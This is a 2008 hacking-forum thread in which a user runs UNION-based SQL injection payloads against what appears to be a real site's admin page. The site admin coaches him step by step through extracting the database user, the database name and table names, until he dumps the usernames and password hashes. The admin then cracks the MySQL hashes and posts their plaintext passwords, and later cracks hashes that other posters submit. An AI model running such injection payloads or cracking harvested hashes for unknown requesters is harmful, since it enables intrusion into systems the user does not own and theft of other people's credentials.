 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 242
 Members: 0
 Total: 242
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
SQL Inj help |
|
 Posted: Wed Feb 20, 2008 4:49 am |
 |
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
 |
|
 |
|
So I have a user info page and there's three errors in 3 different fields with
| Code: | | admin_view_user.php?userid=-1+OR |
| Code: |
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/webpage/****/admin_view_user.php on line 212 |
any userid gives this error.
| Code: | | -1+UNION+ALL+SELECT+@@version--+ |
gives 4.1.11 in userID field
| Code: | | -1+UNION+ALL+SELECT+@@version,@@version--+ |
gives only sql warning error
| Code: |
-1+UNION+ALL+SELECT+@@version,@@version,@@version--+ |
gives only sql warning error
| Code: | | -1+UNION+ALL+SELECT+@@version,@@version,@@version,@@version--+ |
gives 4.1.11 in place where 3rd warning was.
| Code: |
-1+UNION+ALL+SELECT+1,2,3,4 |
gives blah blah 2 blah blah 3 in place where 3rd warning was.
| Code: |
-1+UNION+ALL+SELECT+1,4,5,4--+ |
gives blah blah 4 blah blah 5 in place where 3rd warning was.
| Code: | | -1+UNION+ALL+SELECT+1,2,3,4,5--+ |
back to mysql warning error. This continues no matter how many numbers.
Some help in progressing? |
|
|
|
|
|
|
|
|
| Posted: Wed Feb 20, 2008 10:22 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So "-1+UNION+ALL+SELECT+@@version--+" is working for you, because you got feedback - MySql version.
Next just use this for fetching other data:
| Code: |
-1+UNION+ALL+SELECT+USER()--+
|
| Code: |
-1+UNION+ALL+SELECT+DATABASE()--+
|
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+mysql.user--+
|
About error messages - do they reveal sql schema details, like table and field names? |
|
|
|
|
| Posted: Wed Feb 20, 2008 1:13 pm |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Output from:
-1+UNION+ALL+SELECT+USER()--+
sitename@localhost
-1+UNION+ALL+SELECT+DATABASE()--+
sitename
-1+UNION+ALL+SELECT+COUNT(*)+FROM+mysql.user--+
blank
No error messages are showing schema details. |
|
|
|
|
| Posted: Wed Feb 20, 2008 1:39 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
As version is 4.1.x and there is no INFORMATION_SCHEMA, then you have to guess table and field names ...
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+user--+
|
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+users--+
|
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+admin--+
|
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+admins--+
|
| Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+login--+
|
if you get existing table name, then rows count can be seen. |
|
|
|
|
| Posted: Wed Feb 20, 2008 11:03 pm |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Thanks waraxe i got username and passwords 
But passwords are in weird form i have never seen, maybe you have?
I thought it was just hex but hex decoder doesnt work!
So I made user account to help you.
2894bf0d22b7db6e = conibear
4b5698aa4603595b |
|
|
|
|
| Posted: Thu Feb 21, 2008 12:13 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gibbocool wrote: | Thanks waraxe i got username and passwords
But passwords are in weird form i have never seen, maybe you have?
I thought it was just hex but hex decoder doesnt work!
So I made user account to help you.
2894bf0d22b7db6e = conibear
4b5698aa4603595b |
It's old-style mysql hash algorithm.
Plaintext of 4B5698AA4603595B is abc123
|
|
|
|
|
| Posted: Thu Feb 21, 2008 12:17 am |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
So how did you decode it?
Also
244bb9953224055c |
|
|
|
|
| Posted: Thu Feb 21, 2008 12:26 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gibbocool wrote: | So how did you decode it?
Also
244bb9953224055c |
Plaintext of 244BB9953224055C is ponting
I am using Cain password cracker --> MySql hashes --> Mysql 3.23 Hashes
And this is not decoding, it's cracking. There is difference between them  |
|
|
|
|
| Posted: Thu Feb 21, 2008 12:34 am |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Thanks waraxe
I assume you used rainbow tables? |
|
|
|
|
| Posted: Thu Feb 21, 2008 12:48 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gibbocool wrote: | Thanks waraxe
I assume you used rainbow tables? |
No, currently i don't have mysql hash rainbow tables, only for md5.
But hashes for such easy passwords can be successfully cracked by bruteforce and wordlist methods. And I was using wordlists |
|
|
|
|
| Posted: Sat Mar 01, 2008 11:49 pm |
|
|
| cavevip |
| Regular user |
 |
|
| Joined: Mar 01, 2008 |
| Posts: 10 |
|
|
|
|
|
|
|
7de3c2b43b1239ea
0ae737342ae98ce6
042f00283cae02b2
7389bec86c828d5a
help me crack pass mysql
thanks  |
|
|
|
|
| Posted: Sun Mar 02, 2008 12:08 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| cavevip wrote: | 7de3c2b43b1239ea
0ae737342ae98ce6
042f00283cae02b2
7389bec86c828d5a
help me crack pass mysql
thanks |
Plaintext of 042F00283CAE02B2 is andyn
Plaintext of 0AE737342AE98CE6 is pulteney
Plaintext of 7389BEC86C828D5A is qb35jr7 |
|
|
|
|
|
crack |
|
| Posted: Mon Sep 16, 2013 11:30 am |
|
|
| centro |
| Beginner |
|
|
| Joined: Sep 16, 2013 |
| Posts: 2 |
|
|
|
|
|
|
|
can someone crack this? 64ca7cc70da9d482
thank you friends |
|
|
|
|
| Posted: Fri Feb 28, 2014 8:59 am |
|
|
| goodboya |
| Beginner |
|
|
| Joined: Feb 27, 2014 |
| Posts: 3 |
|
|
|
|
|
|
|
2894bf0d22b7db6e = conibear
_____________________
Fut 14 Coins |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
